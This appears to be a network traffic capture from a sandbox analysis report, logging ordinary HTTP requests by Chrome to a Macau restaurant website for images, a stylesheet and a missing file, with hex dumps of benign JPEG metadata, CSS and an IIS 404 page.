6d 61 6e 4e de 29 bf 54 ea 89 52 a0 02 e8 c5 54 0c 20 73 09 89 4c 4c a4 a8 ab ca 73 39 d7 ad f2 43 1a a4 12 ec 8e 48 44 f6 9f 96 85 6f b8 5a f6 b4 05 05 7c 11 27 0a b5 fb 8f 23 3f f3 23 3e ef 37 4e 22 c7 2e 45 b8 b8 26 38 a3 60 d9 bc 48 52 39 39 54 d3 4a 77 1b 10 21 85 d4 8a c8 6a 64 34 14 a7 23 93 4d 6b f5 39 07 86 fb c4 1a 83 55 14 ea 05 5a a2 4f 6e a9 38 47 d9 77 63 b9 4c f1 3d ba e1 62 9f b4 72 bc 4d ae 9f 35 4f 68 85 3a 5c 5d 38 53 2c 24 a9 f3 87 a9 b5 f7 af 9a f7 a8 ad cb 4e 67 df 16 c0 f7 95 dc da 26 e6 a6 dd 9a 9c fc 5c 63 b6 5b e9 2e 91 84 7e da 42 3f a8 78 32 84 77 a7 2f 9e a2 08 ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedw!Q"2B!1QqA2Rb?[PC9]wErKfnmanN)TRT sLLs9CHDoZ|'#?#>7N".E&8`HR99TJw!jd4#Mk9UZOn8GwcL=brM5Oh:\]8S,$Ng&\c[.~B?x2w/
                                                                                                                                                              Mar 13, 2023 05:27:31.591746092 CET4790OUTGET /uploadfiles/SRL_9_1_3754306.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:31.797600985 CET4858INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 227297
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:24:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "6a91213ba8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:37 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 30 5c 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 f0 15 00 00 01 01 03 00 01 00 00 00 a0 0e 00 00 02 01 03 00 03 00 00 00 b6 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 0f 01 02 00 06 00 00 00 bc 00 00 00 10 01 02 00 15 00 00 00 c2 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 d7 00 00 00 1b 01 05 00 01 00 00 00 df 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1e 00 00 00 e7 00 00 00 32 01 02 00 14 00 00 00 05 01 00 00 69 87 04 00 01 00 00 00 1c 01 00 00 38 03 00 00 08 00 08 00 08 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 49 00 00 9f 24 00 10 27 00 00 00 9f 24 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 32 20 31 30 3a 31 31 3a 35 32 00 00 00 00 1e 00 9a 82 05 00 01 00 00 00 8a 02 00 00 9d 82 05 00 01 00 00 00 92 02 00 00 22 88 03 00 01 00 00 00 01 00 00 00 27 88 03 00 01 00 00 00 64 00 00 00 00 90 07 00 04 00 00 00 30 32 32 31 03 90 02 00 14 00 00 00 9a 02 00 00 04 90 02 00 14 00 00 00 ae 02 00 00 01 92 0a 00 01 00 00 00 c2 02 00 00 02 92 05 00 01 00 00 00 ca 02 00 00 04 92 0a 00 01 00 00 00 d2 02 00 00 05 92 05 00 01 00 00 00 da 02 00 00 07 92 03 00 01 00 00 00 05 00 00 00 09 92 03 00 01 00 00 00 10 00 00 00 0a 92 05 00 01 00 00 00 e2 02 00 00 90 92 02 00 03 00 00 00 33 30 00 00 91 92 02 00 03 00 00 00 33 30 00 00 92 92 02 00 03 00 00 00 33 30 00 00 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 f4 01 00 00 03 a0 04 00 01 00 00 00 4e 01 00 00 0e a2 05 00 01 00 00 00 ea 02 00 00 0f a2 05 00 01 00 00 00 f2 02 00 00 10 a2 03 00 01 00 00 00 02 00 00 00 01 a4 03 00 01 00 00 00 00 00 00 00 02 a4 03 00 01 00 00 00 01 00 00 00 03 a4 03 00 01 00 00 00 01 00 00 00 06 a4 03 00 01 00 00 00 00 00 00 00 31 a4 02 00 0a 00 00 00 fa 02 00 00 32 a4 05 00 04 00 00 00 04 03 00 00 34 a4 02 00 14 00 00 00 24 03 00 00 00 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 00 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 80 b1 55 00 b3 05 00 00 00 21 39 00 be 03 00 00 39 33 30 36 31 31 30 36 37 00 64 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 46 31 30 30 6d 6d 20 66 2f 32 2e 38 20 4d 61 63 72 6f 00 06 00 03 01 03 00 01 00 00 00 06 00 00 00 1a 01 05 00 01 00 00 00 86 03 00 00 1b 01 05 00 01 00 00 00 8e 03 00 00 28 01 03 00 01 00 00 00 02 00 00 00 01 02 04 00 01 00 00 00 96 03 00 00 02 02 04 00 01 00 00 00 be 2c 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48
                                                                                                                                                              Data Ascii: 0\ExifII*(12i8CanonCanon EOS 5D Mark II$'$'Adobe Photoshop CS6 (Windows)2020:06:22 10:11:52"'d0221303030N124$2013:11:08 13:06:342013:11:08 13:06:34dU!9930611067ddEF100mm f/2.8 Macro(,HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-H


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              22192.168.2.34970659.188.3.13280C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:05.824016094 CET613OUTGET /static/bootstrap/css/bootstrap.min.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:06.027168989 CET630INHTTP/1.1 404 Not Found
                                                                                                                                                              Content-Length: 1635
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:11 GMT
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                              Mar 13, 2023 05:26:06.027228117 CET630INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                              Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>
                                                                                                                                                              Mar 13, 2023 05:26:06.029119015 CET631OUTGET /main.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:06.248641968 CET649INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 2297
                                                                                                                                                              Content-Type: text/css
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:10:12 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "684bc33da6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:11 GMT
                                                                                                                                                              Data Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 0d 0a 62 6f 64 79 20 7b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 39 39 39 39 39 39 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 43 45 36 44 36 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 7d 0d 0a 23 6d 61 69 6e 74 61 62 7b 0d 0a 09 77 69 64 74 68 3a 39 37 30 70 78 3b 0d 0a 09 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 30 20 31 37 70 78 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 46 46 46 3b 0d 0a 7d 0d 0a 2e 63 6f 70 79 72 69 67 68 74 20 7b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 33 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 39 39 39 39 36 36 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 69 6d 61 67 65 73 2f 63 6f 70 79 72 69 67 68 74 62 67 2e 6a 70 67 29 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 7d 0d 0a 2e 69 6e 64 65 78 4e 65 77 20 7b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 30 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 30 20 31 30 70 78 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6a 75 73 74 69 66 79 3b 0d 0a 7d 0d 0a 2e 74 65 78 74 30 31 20 7b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 39 39 39 3b 0d 0a 7d 0d 0a 2e 74 65 78 74 30 32 20 7b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0d 0a 7d 0d 0a 2e 6e 65 77 73 20 7b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 33 33 33 33 33 33 3b 0d 0a 09 62 6f 72 64 65 72
                                                                                                                                                              Data Ascii: @charset "utf-8";body {font-family: Tahoma, Arial, Helvetica, sans-serif;font-size: 12px;line-height: 18px;color: #999999;background-color: #ECE6D6;margin: 0px;padding: 0px;}#maintab{width:970px;margin:0 auto;padding:0 17px;background:#FFFFFF;}.copyright {font-family: Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;line-height: 43px;color: #999966;background-image: url(images/copyrightbg.jpg);background-repeat: no-repeat;}.indexNew {font-family: Tahoma, Arial, Helvetica, sans-serif;font-size: 12px;line-height: 20px;color: #FFFFFF;padding:0 10px;text-align: justify;}.text01 {font-family: Tahoma, Arial, Helvetica, sans-serif;font-size: 12px;line-height: 24px;color: #999;}.text02 {font-family: Tahoma, Arial, Helvetica, sans-serif;font-size: 12px;line-height: 24px;color: #666;}.news {font-family: Tahoma, Arial, Helvetica, sans-serif;font-size: 12px;line-height: 30px;color: #333333;border
                                                                                                                                                              Mar 13, 2023 05:26:06.248696089 CET650INData Raw: 2d 62 6f 74 74 6f 6d 3a 23 43 43 43 43 43 43 20 31 70 78 20 64 6f 74 74 65 64 3b 0d 0a 7d 0d 0a 41 2e 6e 65 77 73 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 0d 0a 41 2e 6e 65 77
                                                                                                                                                              Data Ascii: -bottom:#CCCCCC 1px dotted;}A.news{ text-decoration:none; border:none;}A.news:hover{ text-decoration:underline;border:none;}.newsDate {font-family: Tahoma, Arial, Helvetica, sans-serif;font-size: 12px;line-height: 29px;colo
                                                                                                                                                              Mar 13, 2023 05:26:08.473915100 CET1040OUTGET /images/logo_rightPic.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:08.698457003 CET1139INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 24133
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "5cc7bf8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 11 18 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 03 ca 00 00 01 01 00 03 00 00 00 01 00 81 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 33 30 20 31 33 3a 32 35 3a 31 31 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 02 62 a0 03 00 04 00 00 00 01 00 00 00 2b 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 0f 92 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f
                                                                                                                                                              Data Ascii: ExifMM*(12i ''Adobe Photoshop CS6 (Windows)2020:06:30 13:25:110221b+nv(~HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http://
